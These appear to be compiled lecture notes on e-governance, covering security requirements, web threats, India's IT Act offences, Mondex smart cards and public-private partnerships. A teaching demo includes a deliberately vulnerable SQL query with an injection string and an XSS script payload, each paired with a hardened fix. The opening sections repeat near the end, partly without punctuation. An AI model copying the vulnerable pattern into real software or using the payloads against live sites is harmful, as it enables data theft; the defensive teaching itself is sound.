The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT by citizens and businesses. Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of this service.

2. INFORMATION SECURITY

A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:
• understanding an organization's information security requirements and the need to establish policy and objectives for information security;
• implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;
• monitoring and reviewing the performance and effectiveness of the ISMS, and continual improvement based on objective measurement.

Data security requires a set of security requirements:
• Authentication: capability to identify who is using the services (person or software program); the process of verifying that you are who you say you are.
• Authorization: capability to give rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do.
• Confidentiality: capability to prevent unauthorized access to information.
• Integrity: capability to prevent information from unauthorized modification, ensuring that information can be relied upon and is accurate and complete.
• Traceability: capability to chronologically interrelate any transaction to a person or system that performed the action, in a way that is verifiable.
• Non-repudiation: capability to prevent the intervening person or system in an event or action from denying or challenging their participation in the event.
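To show how four of the requirements just listed (authentication, authorization, integrity and traceability) turn into concrete checks at an e-Government service gateway, here is an added example; it is not code from the page or from any e-Government project. The user names, roles, password scheme, shared integrity key and request format are constructed; confidentiality and non-repudiation need encryption and asymmetric signatures and are deliberately left out.

```python
"""Toy e-Government service gateway (added illustration): enforces authentication
(PBKDF2 password check), authorization (role-based rights), integrity (HMAC over
the request body) and traceability (hash-chained audit trail of every attempt)."""
import hashlib
import hmac
import json

SALT = b"constructed-salt"                # real systems use a random salt per user
REQUEST_KEY = b"constructed-request-key"  # integrity key shared with the client
ITERATIONS = 50_000


def _hash_password(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, ITERATIONS)


# Constructed user store with hypothetical roles for a records service.
USERS = {
    "clerk":   {"pw": _hash_password("clerk-pass"),   "rights": {"read_record"}},
    "officer": {"pw": _hash_password("officer-pass"), "rights": {"read_record", "update_record"}},
}


def authenticate(user: str, password: str) -> bool:
    """Authentication: verify the caller is who they say they are (constant-time compare)."""
    record = USERS.get(user)
    if record is None:
        _hash_password(password)          # same cost for unknown users, so timing leaks nothing
        return False
    return hmac.compare_digest(record["pw"], _hash_password(password))


def authorize(user: str, action: str) -> bool:
    """Authorization: verify the caller has the right to do what they are trying to do."""
    return action in USERS.get(user, {}).get("rights", set())


def sign_request(body: bytes) -> str:
    """Integrity tag computed by the client; the gateway recomputes it to detect modification."""
    return hmac.new(REQUEST_KEY, body, "sha256").hexdigest()


def verify_request(body: bytes, tag: str) -> bool:
    return hmac.compare_digest(sign_request(body), tag)


class AuditTrail:
    """Traceability: each entry ties an action to a principal and a sequence position
    and commits to the previous entry's hash, so altering, removing or reordering a
    past entry makes verify() fail."""
    GENESIS = "0" * 64

    def __init__(self):
        self.entries = []

    @staticmethod
    def _digest(entry: dict) -> str:
        body = {k: v for k, v in entry.items() if k != "hash"}
        return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()

    def append(self, user: str, action: str, outcome: str) -> None:
        prev = self.entries[-1]["hash"] if self.entries else self.GENESIS
        entry = {"seq": len(self.entries), "user": user, "action": action,
                 "outcome": outcome, "prev": prev}
        entry["hash"] = self._digest(entry)
        self.entries.append(entry)

    def verify(self) -> bool:
        prev = self.GENESIS
        for entry in self.entries:
            if entry["prev"] != prev or self._digest(entry) != entry["hash"]:
                return False
            prev = entry["hash"]
        return True


def handle_request(trail: AuditTrail, user: str, password: str,
                   action: str, body: bytes, tag: str) -> str:
    """Run the checks in order and log every attempt, accepted or rejected."""
    if not verify_request(body, tag):
        outcome = "rejected: integrity"
    elif not authenticate(user, password):
        outcome = "rejected: authentication"
    elif not authorize(user, action):
        outcome = "rejected: authorization"
    else:
        outcome = "ok"
    trail.append(user, action, outcome)
    return outcome
```

Rejected attempts are logged as well as accepted ones, because a traceable record of who tried what is exactly what the monitoring and review step of the ISMS needs.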

Example of organizational and technical measures to prevent unauthorized access and processing are shown

Protecting premises equipment and systems software including input-output units


• Protecting software applications used to process personal data;
• Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks;
• Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data;
• Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and of the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Despite this, trusted security and privacy measures constitute a crucial success factor for e-Government that has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Documented examples of cyber attacks use techniques like packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

• achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;
• maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;
• continually improve its control environment;
• effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found that 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.
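As an added illustration, not code from these notes, the following Python shows the two web-application flaws the text names, SQL injection and XSS, as a vulnerable citizen lookup beside its hardened form; the portal table, user names and tampered input are constructed for the example.

```python
"""Added example: SQL injection and XSS in a toy citizen-services lookup,
vulnerable version next to the fixed one. Data is constructed, in-memory."""
import html
import sqlite3

# Constructed sample rows standing in for a portal's citizen table.
CITIZENS = [
    ("alice", "Alice Example", "public"),
    ("bob", "Bob Example", "restricted"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (username TEXT, fullname TEXT, record TEXT)")
    conn.executemany("INSERT INTO citizens VALUES (?, ?, ?)", CITIZENS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    # Flaw: the user-supplied value is pasted into the SQL text, so a quote
    # character inside it changes the structure of the query itself.
    sql = f"SELECT fullname, record FROM citizens WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn: sqlite3.Connection, username: str) -> list:
    # Fix: bind the value as a parameter; the driver passes it as data only,
    # so the query shape is fixed no matter what the string contains.
    sql = "SELECT fullname, record FROM citizens WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def render_vulnerable(fullname: str) -> str:
    # Flaw: untrusted data is placed into HTML unescaped (reflected XSS).
    return f"<p>Welcome, {fullname}</p>"


def render_hardened(fullname: str) -> str:
    # Fix: escape for the HTML text context before insertion.
    return f"<p>Welcome, {html.escape(fullname, quote=True)}</p>"


def demo() -> dict:
    """Run both pairs against the same inputs and report what each returns."""
    conn = make_db()
    # A single quote in the input is enough to alter the vulnerable query
    # (the hardened one treats the whole string as a literal user name).
    tampered = "x' OR '1'='1"
    leaked = lookup_vulnerable(conn, tampered)   # every row comes back
    safe = lookup_hardened(conn, tampered)       # no such user: no rows
    markup = "<script>alert(1)</script>"
    return {
        "vulnerable_rows": len(leaked),
        "hardened_rows": len(safe),
        "vulnerable_html_keeps_tag": markup in render_vulnerable(markup),
        "hardened_html_keeps_tag": markup in render_hardened(markup),
    }
```

The parameterized query and the escaping step are the two controls an e-Government web team would check for when reviewing portal code.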

PREPARED BY ARUN PRATAP SINGH 54

54

CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality or social order, or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage, or information warfare and related activities.

Pornography, Threatening Email, Assuming someone's Identity, Sexual Harassment, Defamation, Spam and Phishing are some examples where computers are used to commit crime, whereas Viruses, Worms and Industrial Espionage, Software Piracy and Hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in the IT ACT 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions, requesting them to enter their Username, Password or other personal information to access their Account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base:

• 121 Million Internet Users
• 65 Million Active Internet Users, up by 28% from 51 million in 2010
• 50 Million users shop online on Ecommerce and Online Shopping Sites
• 46+ Million Social Network Users
• 346 million mobile users had subscribed to Data Packages


CYBER LAW

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

• Secures access;
• Downloads, copies or extracts any data, computer database or any information;
• Introduces or causes to be introduced any virus or contaminant;
• Disrupts or causes disruption;
• Denies or causes denial of access to any person;
• Provides any assistance to any person to facilitate access;
• Charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section – 43

• Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means;
• Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person dishonestly or fraudulently does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S66]

S66A - Punishment for sending offensive messages through communication service etc.

Any person who sends, by means of a computer resource or a communication device:

• any information that is grossly offensive or has menacing character; or


• any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
• any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages;

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67 A - Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67 C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It received Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offences and contraventions
4. Justice dispensation systems for cybercrimes

Offences –

| Section | Offence | Punishment |
|---|---|---|
| 65 | Tampering with computer source documents - intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years or/and with fine up to 2 lakh rupees |
| 66 | Hacking | Imprisonment up to three years or/and with fine up to 5 lakh rupees |
| 66-A | Sending offensive message through electronic means - sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine |

Criticisms -

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some of the cyber law observers have criticized the amendments on the ground of lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of Cyber Security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


Limits for collecting personal information
  o loads from account
  o deposits into account
  o lost transactions

Limits for using, disclosing and keeping personal information
  o safeguard deposits
  o to re-imburse for non-performance

Keeping personal information accurate
  o load and unload are online
  o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information
  o firewalls in Multos - between applications - ITSEC 6 designation
  o transaction data to retailer is deliberately limited
  o individual transaction data is not collected by banks - Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.
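As an added illustration, not from these notes or from Mondex, this Python models the overflow problem just described: a card whose offline log holds a fixed number of records, and the bank-side check that uses per-transaction sequence numbers to notice when records were lost before upload. The log capacity, record fields and upload step are assumptions for the example, not Mondex's real design.

```python
"""Added example: bounded offline transaction log on a simulated purse card,
plus a bank-side audit that detects records lost to overflow. Toy model."""
from dataclasses import dataclass, field
from typing import Dict, List


@dataclass(frozen=True)
class Txn:
    seq: int        # per-card monotonic counter, one per purchase (assumed)
    amount: int     # cents
    retailer: str


@dataclass
class Card:
    """Simulated purse with an offline log limited to `capacity` entries."""
    capacity: int = 4
    balance: int = 0
    next_seq: int = 1
    log: List[Txn] = field(default_factory=list)

    def load(self, cents: int) -> None:
        # Loads are online in this model, so they need no offline record.
        self.balance += cents

    def pay(self, cents: int, retailer: str) -> Txn:
        if cents > self.balance:
            raise ValueError("insufficient funds")
        self.balance -= cents
        t = Txn(self.next_seq, cents, retailer)
        self.next_seq += 1
        if len(self.log) == self.capacity:
            self.log.pop(0)   # overflow: the oldest record is lost for good
        self.log.append(t)
        return t

    def upload(self) -> List[Txn]:
        """The retailer terminal or ATM pulls whatever the card still holds."""
        pending = list(self.log)
        self.log.clear()
        return pending


def missing_sequences(last_seen: int, uploaded: List[Txn]) -> List[int]:
    """Bank-side audit: sequence numbers after `last_seen` (the newest record
    from the previous upload) that never arrived. Empty means a complete trail."""
    if not uploaded:
        return []
    seen = {t.seq for t in uploaded}
    return [s for s in range(last_seen + 1, max(seen) + 1) if s not in seen]


def scenario(purchases: int, capacity: int) -> Dict[str, object]:
    """Make `purchases` offline payments of 100 cents on a fresh card, upload
    once, and audit. Returns what the bank can and cannot account for."""
    card = Card(capacity=capacity)
    card.load(10_000)
    for i in range(purchases):
        card.pay(100, f"shop-{i}")
    spent = 10_000 - card.balance             # ground truth held by the card
    records = card.upload()
    accounted = sum(t.amount for t in records)
    gaps = missing_sequences(0, records)       # first upload for this card
    return {
        "spent": spent,
        "accounted": accounted,
        "missing_seqs": gaps,
        "auditable": not gaps and accounted == spent,
    }
```

With four log slots, three purchases between uploads reconcile exactly, while six leave the first two transactions unrecoverable; the sequence gap tells the bank that records were lost but not what they contained.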

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back-office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally, four basic models are available: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance –

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with this definition, if it is to be congruent with a definition of e-governance, is that there is no provision for the governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. The Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP-based e-governance projects. Each project had mammoth state-wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended to reach the desired individual have been met with. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup with the support of local processes and parameters for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government, and enhance citizens' economic and social opportunities so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE


A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and Operating System independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Database Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos Protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, Public Key Security with Secure Sockets Layer (SSL) is popular with Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here, e-Governance tools are used to aid the business community (providers of goods and services) to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment to businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer, and like any organization it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand, and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B) - Refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G) - Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter
• Generally, but not always, involving:
  – Long Term Contracts
  – User Charges and/or Payments flowing between the Parties
  – Shared Investments, but Mainly Private


  – Risk Sharing by the Parties
• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

• Fiscal Head Room
• As a Way of Financing the Project
• Separate Policy & Regulation from Operations


• Make the Good or Service Available
• Pay for Performance and Output
• Introduce Competition – For and In the Market


The Need to Set the Right Priorities –

Four Basic Dimensions of P3

Although each is unique, all P3's include four basic characteristics:

• Shared goals
• Shared resources (time, money, expertise, people)
• Shared risks
• Shared benefits

Benefits

• Expedited project completion
• Project cost savings
• Improved quality
• Use of private resources
• Access to new sources of private capital

Two Major Steps


• Crafting the Partnership
• Implementing the Partnership

Project Management -

Six Distinct Phases

Genesis

• What's the need?
• What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit
• Is there a need for a Public/Private Partnership?


• Preliminary Project Definition

Feasibility

• Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
• Market Research
• Economic/Financial Analysis
• Program, Budget and Schedule
• Risk Analysis

Plan and Test

• Final project definition
• What is the best way to complete the project?
• Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?
• Master Schedule/Budget
• Political Climate
• Any potential "fatal flaws" that could derail the project?

Procurement and Contracting

• How do you choose and contract with the best-value private partner?
• What's the best delivery method? Design-Bid-Build, Design-Build, Finance-Design-Build
• What do current statutes allow?
• Procurement Approach: Sole Source, RFP, Low Bid
• Risk Allocation between Public and Private Partners
• Structuring of Contract/Risks and Rewards


Implement

• Environmental
• Design
• Permitting
• Construction
• Commissioning and Administration

Operate

• Startup
• Monitoring
• Assessment
• Enhancement
• Contract Modifications
• Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations

The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration, but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

